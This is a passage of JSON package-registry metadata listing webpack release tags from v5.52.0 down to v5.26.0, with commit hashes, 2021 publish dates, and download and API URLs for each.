/codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/